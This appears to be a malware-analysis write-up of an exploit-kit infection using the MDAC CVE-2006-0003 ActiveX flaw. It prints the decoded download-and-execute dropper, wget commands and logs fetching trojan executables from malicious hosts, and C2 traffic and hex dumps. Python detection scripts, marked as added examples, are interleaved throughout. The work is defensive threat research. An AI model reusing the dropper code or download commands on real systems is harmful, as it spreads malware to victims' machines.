document.write('');
setTimeout(end_redirect, 60000);
=====================================================
EXPLOITATION & INFECTIONS OCCURRED (PE BASED ONLY)
======================================================
1. MDAC arbitrary file download via Microsoft Data Access Components (MDAC), CVE-2006-0003
ActiveX control CLSID BD96C556-65A3-11D0-983A-00C04FC29E36 is used to create adodb.stream and Shell.Application objects
msxml2.XMLh00p is used to download the malware below
SaveToFile writes it to .//..//03ab326.exe, which is then launched through shellexecute
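As an added example (not part of the original analysis), the following Python script shows how a defender can detect the MDAC/adodb.stream download-and-execute pattern above in captured JavaScript. It first folds the string-splitting trick the kit uses (`"adod".concat("b.str", "eam")`, `"a" + "b"`) back into single literals, then matches the indicators that appear in the decoded script on this page (the BD96C556-65A3-11D0-983A-00C04FC29E36 CLSID, adodb.stream, Shell.Application, SaveToFile, shellexecute). The sample inputs are constructed: the first is a trimmed copy of the page's decoded dropper, the second a benign snippet; the indicator names, function names and verdict strings are my own.

```python
import re

# One JS string literal, double- or single-quoted, with backslash escapes.
STR_LIT = r'(?:"(?:[^"\\]|\\.)*"|\'(?:[^\'\\]|\\.)*\')'
# "lit".concat("lit", "lit", ...) where every argument is itself a literal
CONCAT_RE = re.compile(r'(%s)\.concat\(\s*((?:%s\s*,\s*)*%s)\s*\)' % (STR_LIT, STR_LIT, STR_LIT))
# "lit" + "lit"
PLUS_RE = re.compile(r'(%s)\s*\+\s*(%s)' % (STR_LIT, STR_LIT))

def unquote(lit):
    """Strip the surrounding quotes of a literal (escapes are left as-is)."""
    return lit[1:-1]

def normalize_strings(js):
    """Fold literal-only .concat() calls and '+' chains into single literals.
    Repeats until nothing changes so that "a" + "b" + "c" is fully joined."""
    def join_concat(m):
        parts = [m.group(1)] + re.findall(STR_LIT, m.group(2))
        return '"' + "".join(unquote(p) for p in parts) + '"'
    prev = None
    while prev != js:
        prev = js
        js = CONCAT_RE.sub(join_concat, js)
        js = PLUS_RE.sub(lambda m: '"' + unquote(m.group(1)) + unquote(m.group(2)) + '"', js)
    return js

# Indicators taken from the decoded script on this page (rule names are my own).
INDICATORS = {
    "mdac_clsid":        re.compile(r"BD96C556-65A3-11D0-983A-00C04FC29E36", re.I),
    "adodb_stream":      re.compile(r"adodb\.stream", re.I),
    "shell_application": re.compile(r"Shell\.Application", re.I),
    "save_to_file":      re.compile(r"\.SaveToFile\s*\(", re.I),
    "shell_execute":     re.compile(r"\bshellexecute\s*\(", re.I),
}

def scan_js(js):
    """Return {indicator: matched?} over the de-obfuscated script."""
    text = normalize_strings(js)
    return {name: rx.search(text) is not None for name, rx in INDICATORS.items()}

def classify(js):
    """The CLSID plus a stream object plus a write/exec call is the full
    download-and-execute chain; partial hits are flagged for manual review."""
    hits = scan_js(js)
    if hits["mdac_clsid"] and hits["adodb_stream"] and (hits["save_to_file"] or hits["shell_execute"]):
        return "mdac-arbitrary-file-download"
    if sum(hits.values()) >= 2:
        return "suspicious"
    return "clean"

# Constructed sample: trimmed from the decoded dropper shown on this page.
DROPPER_SAMPLE = '''
var ra4 = ".//..//03ab326.exe", ra3 = document.createElement("object");
ra3.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var ra0 = ra3.CreateObject("adod".concat("b.str", "eam"), "");
var ra1 = ra3.CreateObject("Shell.Application", "");
ra0.SaveToFile(ra4, 2);
with (ra1){ shellexecute(ra4); }
'''
# Constructed benign sample: ordinary string building, no ActiveX use.
BENIGN_SAMPLE = 'var s = "hello".concat(", ", "world") + "!"; document.write(s);'

if __name__ == "__main__":
    print(classify(DROPPER_SAMPLE), scan_js(DROPPER_SAMPLE))
    print(classify(BENIGN_SAMPLE))
```

The normalization step is what makes the `"adod".concat("b.str", "eam")` split visible to a plain substring match; without it a signature on `adodb.stream` misses this sample entirely, which is exactly why the kit splits the string.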
--user-agent="Mozila/4.3(X11; U; MacOSX)"
--cookies=on --keep-session-cookies --save-cookies mycookies.txt
--referer="h00p://74.200.211.205/SQeyUUzT/js.js"
"h00p://ser.luckypetspetsitting.com/links/return-west.php?hjiufm=350a050538&nqh=04023834373306350403&nke=04&ejg=yzo&nxsgive=kqhwy"
--output-document="03ab326.exe"
--16:38:25-- h00p://ser.luckypetspetsitting.com/links/return-west.php?hjiufm=350a050538&nqh=04023834373306350403&nke=04&ejg=yzo&nxsgive=kqhwy
=> `sample1'
Resolving ser.luckypetspetsitting.com... 198.143.159.66
Connecting to ser.luckypetspetsitting.com|198.143.159.66|:80... connected.
h00p request sent, awaiting response... 200 OK
Length: 256,784 (251K) [application/x-msdownload]
16:38:27 (157.68 KB/s) - `03ab326.exe' saved [256784/256784]
2. h00p://4.icedambusters.com/adobe/update_flash_player.exe
--18:15:25-- h00p://4.icedambusters.com/adobe/update_flash_player.exe
=> `update_flash_player.exe'
Resolving 4.icedambusters.com... 198.74.52.86
Connecting to 4.icedambusters.com|198.74.52.86|:80... connected.
h00p request sent, awaiting response... 200 OK
Length: 256,784 (251K) [application/octet-stream]
18:15:28 (154.60 KB/s) - `update_flash_player.exe' saved [256784/256784] SAME LOGIC AS THE PREVIOUSLY DROPPED FILE!
==============================================================================
FULL NETWORK ANALYSIS of the Trojan/Backdoor/Encrypt/Downloader `03ab326.exe' saved [256784/256784]
================================================================================
1) DNS : Standard query A rabbitharky.com
0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
0010 00 3d 23 dc 00 00 80 11 3e c8 c0 a8 07 54 08 08 .=#..... >....T..
0020 08 08 04 12 00 35 00 29 cc c4 d0 20 01 00 00 01 .....5.) ... ....
0030 00 00 00 00 00 00 0b 72 61 62 62 69 74 68 61 72 .......r abbithar
0040 6b 79 03 63 6f 6d 00 00 01 00 01 ky.com.. ...
Standard query response A 198.143.159.66
0000 00 12 f0 e9 3e 3e 00 a0 c9 22 b0 ee 08 00 45 00 ....>>.. ."....E.
0010 00 4d 00 00 40 00 35 11 6d 94 08 08 08 08 c0 a8 .M..@.5. m.......
0020 07 54 00 35 04 12 00 39 47 e1 d0 20 81 80 00 01 .T.5...9 G.. ....
0030 00 01 00 00 00 00 0b 72 61 62 62 69 74 68 61 72 .......r abbithar
0040 6b 79 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 ky.com.. ........
0050 01 00 00 1c 1f 00 04 c6 8f 9f 42 ........ ..B
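As an added example that is not part of the original write-up, here is a small Python parser for the DNS response frame dumped above: it strips the Ethernet, IPv4 and UDP headers, decodes the DNS question and answer sections (including the 0xc00c compression pointer in the answer name), and returns the name/IP pair an analyst would add to the indicator list. The byte string is constructed from the hex dump on this page; the function names are my own.

```python
import struct

# Constructed from the hex dump on this page: the 91-byte frame carrying the
# A-record response for rabbitharky.com (Ethernet II + IPv4 + UDP + DNS).
RESPONSE_FRAME = bytes.fromhex(
    "00 12 f0 e9 3e 3e 00 a0 c9 22 b0 ee 08 00 45 00"
    " 00 4d 00 00 40 00 35 11 6d 94 08 08 08 08 c0 a8"
    " 07 54 00 35 04 12 00 39 47 e1 d0 20 81 80 00 01"
    " 00 01 00 00 00 00 0b 72 61 62 62 69 74 68 61 72"
    " 6b 79 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00"
    " 01 00 00 1c 1f 00 04 c6 8f 9f 42"
)

def udp_payload(frame):
    """Strip Ethernet II, IPv4 and UDP headers; return the DNS message."""
    if struct.unpack("!H", frame[12:14])[0] != 0x0800:
        raise ValueError("not IPv4")
    ihl = (frame[14] & 0x0F) * 4              # IPv4 header length in bytes
    if frame[14 + 9] != 17:
        raise ValueError("not UDP")
    udp = 14 + ihl
    sport, dport, ulen = struct.unpack("!HHH", frame[udp:udp + 6])
    if 53 not in (sport, dport):
        raise ValueError("not DNS port 53")
    return frame[udp + 8:udp + ulen]

def read_name(msg, off):
    """Decode a (possibly compressed) name; return (name, offset after it)."""
    labels, end, seen = [], None, set()
    while True:
        if off in seen:                       # guard against pointer loops
            raise ValueError("compression loop")
        seen.add(off)
        length = msg[off]
        if length == 0:
            off += 1
            break
        if length & 0xC0 == 0xC0:             # 2-byte pointer, e.g. 0xc00c
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            if end is None:
                end = off + 2                 # resume after the pointer
            off = ptr
            continue
        labels.append(msg[off + 1:off + 1 + length].decode("ascii"))
        off += 1 + length
    return ".".join(labels), (end if end is not None else off)

def parse_dns(msg):
    """Parse header, question and answer sections of a DNS message."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!6H", msg[:12])
    off = 12
    questions = []
    for _ in range(qd):
        name, off = read_name(msg, off)
        qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
        off += 4
        questions.append((name, qtype, qclass))
    answers = []
    for _ in range(an):
        name, off = read_name(msg, off)
        rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:         # A record: render as dotted quad
            rdata = ".".join(str(b) for b in rdata)
        answers.append((name, rtype, ttl, rdata))
    return {"id": txid, "is_response": bool(flags & 0x8000),
            "rcode": flags & 0x000F, "questions": questions, "answers": answers}

def resolved_hosts(frame):
    """(name, ip) pairs for every A answer in the frame: the IoC pivot."""
    rec = parse_dns(udp_payload(frame))
    return [(name, ip) for name, rtype, _ttl, ip in rec["answers"] if rtype == 1]

if __name__ == "__main__":
    print(parse_dns(udp_payload(RESPONSE_FRAME)))
    print(resolved_hosts(RESPONSE_FRAME))
```

Running it on the captured frame gives the pivot the author draws by hand above: rabbitharky.com resolves to 198.143.159.66, the same host that serves the return-west.php plugin-detect page, with a TTL of 7199 seconds.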
2) h00p/1.0 POST: 192.168.7.84 => 198.143.159.66
POST /forum/viewtopic.php h00p/1.0
Host: rabbitharky.com
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 257
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
CRYPTED0.....?E..+...X.Q...M.....i....fx....F.hp.q.....2.=B..*..8..EA`....sj[..
...O...2.#Ic.4H..BE...s..$.i.,X.....o.R..Eg.y.......Kl...&..7l.........t..ws...S
.....1...R.Pj/.Os..L2Z:.s.. C......D&.<.W`...........*
pH...v*].....1..jw`a.....<"....4
M.R,.._X..
h00p/1.1 200 OK
Server: nginx/0.7.67
Date: Sat, 27 Oct 2012 08:17:04 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.14-1~dotdeb.0
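The POST above is the check-in traffic of the dropped sample. As an added example, not from the original post, the Python below parses a raw HTTP request and scores the traits visible in that capture: an HTTP/1.0 POST to a .php path with Content-Type application/octet-stream, Content-Encoding: binary, an outdated MSIE 5.0 / Windows 98 User-Agent, and a body beginning with the literal CRYPTED. The sample request is constructed from the headers shown on this page with a zero-filled placeholder body padded to the declared 257 bytes in place of the real encrypted payload; the rule names, function names and verdict strings are my own.

```python
import re

def parse_http_request(raw):
    """Split a raw request into method/path/version, lower-cased headers, body."""
    head, _sep, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _colon, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version,
            "headers": headers, "body": body}

def content_length_ok(req):
    """True when Content-Length matches the body actually sent (or is absent)."""
    declared = req["headers"].get("content-length")
    return declared is None or int(declared) == len(req["body"])

# Traits of the check-in captured on this page; rule names are my own.
RULES = {
    "octet_stream_post": lambda r: (
        r["method"] == "POST"
        and r["headers"].get("content-type", "").lower() == "application/octet-stream"),
    "binary_content_encoding": lambda r: (
        r["headers"].get("content-encoding", "").lower() == "binary"),
    "legacy_msie_ua": lambda r: (
        re.search(r"MSIE [4-6]\.\d.*Windows 98", r["headers"].get("user-agent", "")) is not None),
    "crypted_body_prefix": lambda r: r["body"].startswith(b"CRYPTED"),
    "http10_to_php": lambda r: (
        r["version"] == "HTTP/1.0" and r["path"].lower().endswith(".php")),
}

def score_request(raw):
    """Return (names of rules that hit, verdict) for one raw request."""
    req = parse_http_request(raw)
    hits = [name for name, rule in RULES.items() if rule(req)]
    if "crypted_body_prefix" in hits and "octet_stream_post" in hits:
        return hits, "c2-beacon-pattern"
    if len(hits) >= 3:
        return hits, "suspicious"
    return hits, "benign"

# Constructed from the headers shown on this page; the real 257-byte encrypted
# payload is replaced by "CRYPTED0" followed by zero bytes up to that length.
BEACON_REQUEST = (
    b"POST /forum/viewtopic.php HTTP/1.0\r\n"
    b"Host: rabbitharky.com\r\n"
    b"Accept: */*\r\n"
    b"Accept-Encoding: identity, *;q=0\r\n"
    b"Content-Length: 257\r\n"
    b"Connection: close\r\n"
    b"Content-Type: application/octet-stream\r\n"
    b"Content-Encoding: binary\r\n"
    b"User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)\r\n"
    b"\r\n"
    b"CRYPTED0" + bytes(257 - len(b"CRYPTED0"))
)
# Constructed ordinary browser request for comparison.
BENIGN_REQUEST = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0 (X11; Linux x86_64)\r\n"
    b"Accept: text/html\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    print(score_request(BEACON_REQUEST))
    print(score_request(BENIGN_REQUEST))
```

A proxy or IDS rule built from the same traits should key on the combination (binary POST body with the CRYPTED prefix and the anachronistic User-Agent), since any single header here is common enough in legitimate traffic to produce noise on its own.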
3) h00p/1.0 GET: SpringBackColorado.com/CaBPXFg.exe
GET /CaBPXFg.exe h00p/1.0
Host: SpringBackColorado.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
h00p/1.1 200 OK
Date: Sat, 27 Oct 2012 08:17:05 GMT
Server: Apache
Last-Modified: Sat, 27 Oct 2012 08:00:19 GMT
Accept-Ranges: bytes
Content-Length: 424208
Connection: close
Content-Type: application/x-msdownload
MZ......................@.........................................
......!..L.!This program cannot be run in DOS mode.$.......PE..L...
R..P...............2.4...8......@........P....@....................
..............\......................................hw..x.........
...........n..........,............................................
........y...............................text....2.......4..........
........ ..`.data....3...P...4...6..............@....reloc..,......
......j..............@..B................U..]............U..]......
......U...H....H.F.P.=.......L.F.]....U..Q.E......E..h"@..P.F...]..
...U...E..M..H...].U...E..@.]......U......E..E..M..M..E......U...T.
F..E..X.F..
:
:
f.u.5.q.f.9.o.8.J.7.d.d.A.2.r.4.N.W.p.U.v.r.Z.y.x.S.G0
..*.H..
........ ....o
s... fqQ....Jw..F.V..,)rq2}v. }{,.....D.".
p....o..K..u..
...qQ.....Us9.4 L.........X...M^.U.$...<6K..92JOK[.......]....}......
PoC:
--17:45:52-- h00p://springbackcolorado.com/CaBPXFg.exe
=> `CaBPXFg.exe'
Resolving springbackcolorado.com... 64.29.151.221
Connecting to springbackcolorado.com|64.29.151.221|:80... connected.
h00p request sent, awaiting response... 200 OK
Length: 424,208 (414K) [application/x-msdownload]
17:45:59 (60.89 KB/s) - `CaBPXFg.exe' saved [424208/424208]
4) h00p/1.0 GET: 180degrees.org.nz/cXbAC.exe
GET /cXbAC.exe h00p/1.0
Host: 180degrees.org.nz
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
h00p/1.1 200 OK
Date: Sat, 27 Oct 2012 08:17:12 GMT
Server: Apache
Last-Modified: Sat, 27 Oct 2012 08:00:13 GMT
Accept-Ranges: bytes
Content-Length: 424208
Connection: close
Content-Type: application/x-msdownload
PoC:
--17:50:13-- h00p://180degrees.org.nz/cXbAC.exe
=> `cXbAC.exe'
Resolving 180degrees.org.nz... 66.117.15.147
Connecting to 180degrees.org.nz|66.117.15.147|:80... connected.
h00p request sent, awaiting response... 200 OK
Length: 424,208 (414K) [application/x-msdownload]
17:50:16 (206.57 KB/s) - `cXbAC.exe' saved [424208/424208]
5) h00p/1.0 GET: weareseasons.com/7yoZf5.exe
GET /7yoZf5.exe h00p/1.0
Host: weareseasons.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
h00p/1.1 200 OK
Date: Sat, 27 Oct 2012 08:17:19 GMT
Server: Apache
Last-Modified: Sat, 27 Oct 2012 08:00:18 GMT
ETag: "b008a82d-67910-4cd05d3c57d54"
Accept-Ranges: bytes
Content-Length: 424208
Connection: close
Content-Type: application/x-msdos-program
PoC:
--17:54:45-- h00p://weareseasons.com/7yoZf5.exe
=> `7yoZf5.exe'
Resolving weareseasons.com... 87.106.194.196
Connecting to weareseasons.com|87.106.194.196|:80... connected.
h00p request sent, awaiting response... 200 OK
Length: 424,208 (414K) [application/x-msdos-program]
17:54:51 (78.59 KB/s) - `7yoZf5.exe' saved [424208/424208]
6) CONTACTING A HOST & REJECTED: 192.168.7.84⇒108.198.141.10 TCP td-postman > 13145 [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
SYN:
0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
0010 00 30 26 54 40 00 80 06 12 a7 c0 a8 07 54 6c c6 .0&T@... .....Tl.
0020 8d 0a 04 19 33 59 ca f9 23 c4 00 00 00 00 70 02 ....3Y.. #.....p.
0030 40 00 5b 22 00 00 02 04 05 b4 01 01 04 02 @.[".... ......
REPLIES:
0000 00 12 f0 e9 3e 3e 00 a0 c9 22 b0 ee 08 00 45 00 ....>>.. ."....E.
0010 00 3f 58 42 40 00 f1 06 6f a9 6c c6 8d 0a c0 a8 .?XB@... o.l.....
0020 07 54 33 59 04 19 00 00 00 00 ca f9 23 c5 50 14 .T3Y.... ....#.P.
0030 00 00 f2 a0 00 00 47 6f 20 61 77 61 79 2c 20 77 ......Go away, w
0040 65 27 72 65 20 6e 6f 74 20 68 6f 6d 65 e're not home
:-)) LOLZ
7) SYN & ACK to Malware Host 195.169.125.228
195.169.125.228 192.168.7.84 TCP 13606 > cma [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
0000 00 12 f0 e9 3e 3e 00 a0 c9 22 b0 ee 08 00 45 00 ....>>.. ."....E.
0010 00 28 00 00 40 00 2e 06 43 46 c3 a9 7d e4 c0 a8 .(..@... CF..}...
0020 07 54 35 26 04 1a 00 00 00 00 45 bf 07 2d 50 14 .T5&.... ..E..-P.
0030 00 00 20 1a 00 00 7e 7e 7e 7e 7e 7e .. ...~~ ~~~~
192.168.7.84 195.169.125.228 TCP cma > 13606 [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
0010 00 30 26 64 40 00 80 06 ca d9 c0 a8 07 54 c3 a9 .0&d@... .....T..
0020 7d e4 04 1a 35 26 45 bf 07 2c 00 00 00 00 70 02 }...5&E. .,....p.
0030 40 00 b3 69 00 00 02 04 05 b4 01 01 04 02 @..i.... ......
8) KEEP ALIVE DATA SENT TO 70.138.242.12
192.168.7.84 70.138.242.12 TCP optima-vnet > 21913 [SYN] Seq=0 Win=16384 Len=0 MSS=1460 SACK_PERM=1
0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
0010 00 30 26 67 40 00 80 06 d3 cd c0 a8 07 54 46 8a .0&g@... .....TF.
0020 f2 0c 04 1b 55 99 0f 73 e2 af 00 00 00 00 70 02 ....U..s ......p.
0030 40 00 f6 b4 00 00 02 04 05 b4 01 01 04 02 @....... ......
0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
0010 00 30 26 7f 40 00 80 06 d3 b5 c0 a8 07 54 46 8a .0&.@... .....TF.
0020 f2 0c 04 1b 55 99 0f 73 e2 af 00 00 00 00 70 02 ....U..s ......p.
0030 40 00 f6 b4 00 00 02 04 05 b4 01 01 04 02 @....... ......
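Added example (not part of the original log): a small decoder for the Wireshark-style hex dumps in sections 6 to 8 above. It rebuilds the raw frame, walks the Ethernet/IPv4/TCP headers and pulls out addresses, flags and any payload, so a defender can confirm from the capture alone that the 108.198.141.10 "reply" is a RST/ACK that carries the text "Go away, we're not home" rather than a real session. The two dumps embedded below are copied from section 6; the function and variable names are my own.

```python
import struct

# Two frames copied from section 6 of the capture above: the SYN from the
# infected host (192.168.7.84) and the RST/ACK that came back with a text body.
SYN_DUMP = """\
0000 00 a0 c9 22 b0 ee 00 12 f0 e9 3e 3e 08 00 45 00 ...".... ..>>..E.
0010 00 30 26 54 40 00 80 06 12 a7 c0 a8 07 54 6c c6 .0&T@... .....Tl.
0020 8d 0a 04 19 33 59 ca f9 23 c4 00 00 00 00 70 02 ....3Y.. #.....p.
0030 40 00 5b 22 00 00 02 04 05 b4 01 01 04 02 @.[".... ......
"""
REPLY_DUMP = """\
0000 00 12 f0 e9 3e 3e 00 a0 c9 22 b0 ee 08 00 45 00 ....>>.. ."....E.
0010 00 3f 58 42 40 00 f1 06 6f a9 6c c6 8d 0a c0 a8 .?XB@... o.l.....
0020 07 54 33 59 04 19 00 00 00 00 ca f9 23 c5 50 14 .T3Y.... ....#.P.
0030 00 00 f2 a0 00 00 47 6f 20 61 77 61 79 2c 20 77 ......Go away, w
0040 65 27 72 65 20 6e 6f 74 20 68 6f 6d 65 e're not home
"""

TCP_FLAGS = [(0x01, "FIN"), (0x02, "SYN"), (0x04, "RST"), (0x08, "PSH"),
             (0x10, "ACK"), (0x20, "URG")]

def hexdump_to_bytes(dump: str) -> bytes:
    """Rebuild the raw frame from an 'offset hex... ascii' dump (max 16 bytes
    per line). Hex tokens are consumed until the ASCII column is reached."""
    out = bytearray()
    for line in dump.splitlines():
        tokens = line.split()[1:]          # drop the 4-digit offset column
        for tok in tokens[:16]:
            if len(tok) != 2 or not all(c in "0123456789abcdef" for c in tok.lower()):
                break                      # first non-hex token = ASCII column
            out.append(int(tok, 16))
    return bytes(out)

def decode_tcp_frame(frame: bytes) -> dict:
    """Decode Ethernet/IPv4/TCP and return endpoints, flag names and payload."""
    if frame[12:14] != b"\x08\x00":
        raise ValueError("not an IPv4 frame")
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4                # IP header length in bytes
    total_len = struct.unpack("!H", ip[2:4])[0]
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    tcp = ip[ihl:total_len]                 # bound by IP length, not capture length
    sport, dport = struct.unpack("!HH", tcp[:4])
    doff = (tcp[12] >> 4) * 4               # TCP header length incl. options
    flags = [name for bit, name in TCP_FLAGS if tcp[13] & bit]
    return {"src": src, "dst": dst, "sport": sport, "dport": dport,
            "flags": flags, "payload": tcp[doff:]}

if __name__ == "__main__":
    print(decode_tcp_frame(hexdump_to_bytes(REPLY_DUMP)))
```

The same two functions decode the section 7 and 8 dumps unchanged; a RST carrying data is a handy signature because a normal stack never attaches a payload to a reset.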
-------
#MalwareMustDie!!! Crusaders Rocks!!
Hope the malware morons, yeah, you! Choke to death after reading this & go straight to hell!!!!